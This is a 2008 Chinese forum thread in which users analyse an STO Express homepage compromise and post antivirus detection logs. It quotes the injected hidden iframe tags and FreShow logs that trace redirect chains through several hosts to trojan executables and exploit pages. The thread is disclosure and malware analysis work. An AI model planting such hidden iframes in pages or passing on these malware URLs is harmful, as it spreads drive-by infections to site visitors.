"申通快递"主页的计数器还是有问题的

ALEXBLAIR

不知道为什么，申通快递得那个帖子被锁定了
不过，还是进去看看（冲动总是恶魔~~~）

打开后，发现的确有东西可看

1. 
   
2. <BODY text=#000000><IFRAME src="http://60.190.118.244/5.htm" frameBorder=0 width=20 height=0></IFRAME>]
   

复制代码

头部的代码之后就是转接了
大概是这样的

1. 
   
2. 
   
3. <IFRAME src="http://60.190.118.244/5.htm" frameBorder=0 width=20 height=0></IFRAME>
   
4. 
   
5.     --> <iframe src=http://60.190.118.244/vip.htm width=0 height=0></iframe>
   
6. 
   
7.       --><iframe src=614.htm width=0 height=0></iframe>
   
8. 
   
9.                 -->http://60.190.118.243/x.exe
   
10. 
    
11.       --><iframe src=real.htm width=100 height=0></iframe>
    
12. 
    
13.                 -->http://60.190.118.243/x.exe
    
14. 
    
15.       --><iframe src=lz.htm width=100 height=0></iframe>
    
16. 
    
17.                 -->http://60.190.118.243/x.exe
    
18. 
    

复制代码

aerbeisi

[Found security risk]         <W32/OnlineGames.H.gen!Eldorado (not disinfectable, generic)>        C:\test\x.rar->x.exe

秋叶濛濛

额 果然还是有问题
把眼睛都看花了也没找出来

Log is generated by FreShow.
[wide]http://www.sto.cn
    [frame]http://60.190.118.244/5.htm
        [frame]http://60.190.118.244/vip.htm
            [frame]http://60.190.118.244/614.htm
                [object]http://60.190.118.243/x.exe
            [frame]http://60.190.118.244/real.htm
                [object]http://60.190.118.243/x.exe
            [frame]http://60.190.118.244/lz.htm
                [object]http://60.190.118.243/x.exe

haohaoxuexi

[ 本帖最后由 秋叶濛濛 于 2008-3-30 18:17 编辑 ]

Palkia

病毒： Trojan.Win32.Undef.efz

lx1234

2008-3-30 18:12:25        文件系统实时防护        文件        F:\下载\x.exe.td        Win32/TrojanDownloader.Agent.NXA 特洛伊木马 的变种        通过删除清除 - 已隔离        NT AUTHORITY\SYSTEM        在被应用程序修改的文件上发生事件: D:\Program Files\Thunder\Program\Thunder5.exe.

Starting the file scan:

Begin scan in 'D:\x.rar'
D:\x.rar
  [0] Archive type: RAR
  --> x.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [INFO]      The file was deleted!

tanlimo

这个地址时有时无而且还会自动改变：<iframe src=http://60.190.118.244/5.htm width=20 height=0 frameborder=0></iframe>

现在是：
<iframe src=http://www.555abc.com/yahoo/index.htm?604 width=0 height=0></iframe>

可能是服务器那边有arp






Log is generated by FreShow.
[wide]http://www.sto.cn
    [frame]http://www.555abc.com/yahoo/index.htm?604
        [frame]http://www.555abc.com/yahoo/*
            [script]http://adsl.jk33581.com/web/1.js
            [script]http://adsl.jk33581.com/web/bf.js
            [script]http://adsl.jk33581.com/web/pps.js
            [frame]http://adsl.jk33581.com/web/3.htm
        [script]http://www.555abc.com/yahoo/Ajax.gif
            [frame]http://adsl.jk33581.com/web/rl.htm
            [object]http://www.555abc.com/yahoo/yes.exe
        [frame]http://www.555abc.com/yahoo/Ms06014.htm
            [object]http://www.555abc.com/yahoo/yes.exe
        [script]http://www.555abc.com/yahoo/Real.js
        [script]http://www.555abc.com/yahoo/Bfyy.gif
        [script]http://www.555abc.com/yahoo/XunLei.gif
        [script]http://www.555abc.com/yahoo/Lz.gif
        [frame]http://www.555abc.com/yahoo/QVod.html
        [frame]http://www.555abc.com/yahoo/Ms07004.html
        [frame]http://www.555abc.com/yahoo/07033.htm
        [frame]http://www.555abc.com/yahoo/ienorun.htm
        [frame]http://www.555abc.com/yahoo/xunlei.htm
        [frame]http://www.555abc.com/yahoo/cx.htm
        [frame]http://www.555abc.com/yahoo/baidu.htm
        [frame]http://adsl.jk33581.com/web/6601220.htm
            [frame]http://adsl.jk33581.com/web/htm.html
                [script]http://adsl.jk33581.com/web/1.js
                    [object]http://exe.xinniankl.com/014.exe
                [script]http://adsl.jk33581.com/web/bf.js
                    [object]http://exe.xinniankl.com/bf.exe
                [script]http://adsl.jk33581.com/web/pps.js
                    [object]http://exe.xinniankl.com/pps.exe
                [frame]http://adsl.jk33581.com/web/3.htm
                    [object]http://exe.xinniankl.com/lz.exe
        [frame]http://75.cncz.us/kew75.htm?hj
            [frame]http://75.cncz.us/w/u.html
                [frame]http://75.cncz.us/w/1.gif
                    [object]http://u3.cncz.us/d/614.exe
                [frame]http://75.cncz.us/w/2.gif
                    [object]http://u.cncz.us/d/rl.exe
                [frame]http://75.cncz.us/w/3.gif
                    [object]http://u.cncz.us/d/bf.exe
                [frame]http://75.cncz.us/w/4.gif
                    [object]http://u.cncz.us/d/pps.exe
                [frame]http://75.cncz.us/w/5.gif
                    [object]http://u.cncz.us/d/lz.exe
                [frame]http://75.cncz.us/w/6.gif
                    [object]http://u.cncz.us/d/xl.exe
            [frame]http://75.cncz.us/20080318/u.html
                [frame]http://75.cncz.us/20080318/1.gif
                    [object]http://20080318.2008dajiafa.cn/614.exe
                [frame]http://75.cncz.us/20080318/2.gif
                    [object]http://20080318.2008dajiafa.cn/rl.exe
                [frame]http://75.cncz.us/20080318/3.gif
                    [object]http://20080318.2008dajiafa.cn/bf.exe
                [frame]http://75.cncz.us/20080318/4.gif
                    [object]http://20080318.2008dajiafa.cn/pps.exe
                [frame]http://75.cncz.us/20080318/5.gif
                    [object]http://20080318.2008dajiafa.cn/lz.exe
                [frame]http://75.cncz.us/20080318/6.gif
                    [object]http://20080318.2008dajiafa.cn/xl.exe
                [object]http://20080318.2008dajiafa.cn/ad.cab
        [frame]http://web.haole1.cn/web/ww004.htm
            [frame]http://web.haole1.cn/web/06014.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/yyfb.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/pps.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/lz.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/cx.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/IENoRun.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/xunlei.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/07004.htm
            [frame]http://web.haole1.cn/web/0733.htm
            [frame]http://web.haole1.cn/web/baidu.htm
        [frame]http://xxx.er19.com/output/1/11.asp
            [frame]http://dd00.2008dajiafa.cn/vip/Zn36517.htm
            [frame]http://75.cncz.us/kew75.htm?11
            [frame]http://www.haole555.cn/tj1/main.htm
            [frame]http://aaa.faba01.com/hao109.htm
            [frame]http://club.pchome.net/forum_5_45____.html
            [frame]http://www.music100000.cn/wm/222.htm
            [frame]http://adsl.jk33581.com/web/6604635.htm
            [frame]http://www.916kk.com/index.htm
            [frame]http://wb.shijiediyi.net/one/huai4.htm?804
            [script]http://s16.cnzz.com/stat.php?id=809081&web_id=809081&show=pic
            [frame]http://club.pchome.net/forum_1_15.html
            [frame]http://75.cncz.us/kew75.htm?11
            [frame]http://www.music100000.cn/wm/222.htm
            [frame]http://adsl.jk33581.com/web/6604635.htm
            [frame]http://www.916kk.com/index.htm
        [script]http://www.555abc.com/yahoo/b.js
        [script]http://js.users.51.la/1720746.js

我的天！不来啦，谁继续........

[ 本帖最后由 tanlimo 于 2008-3-30 19:10 编辑 ]

秋叶濛濛

原帖由 tanlimo 于 2008-3-30 18:20 发表
这个地址时有时无：

可能是服务器那边有arp

恩 上午看的时候还没有

tracydk

avg不杀

深红的雪

直接被遨游block掉了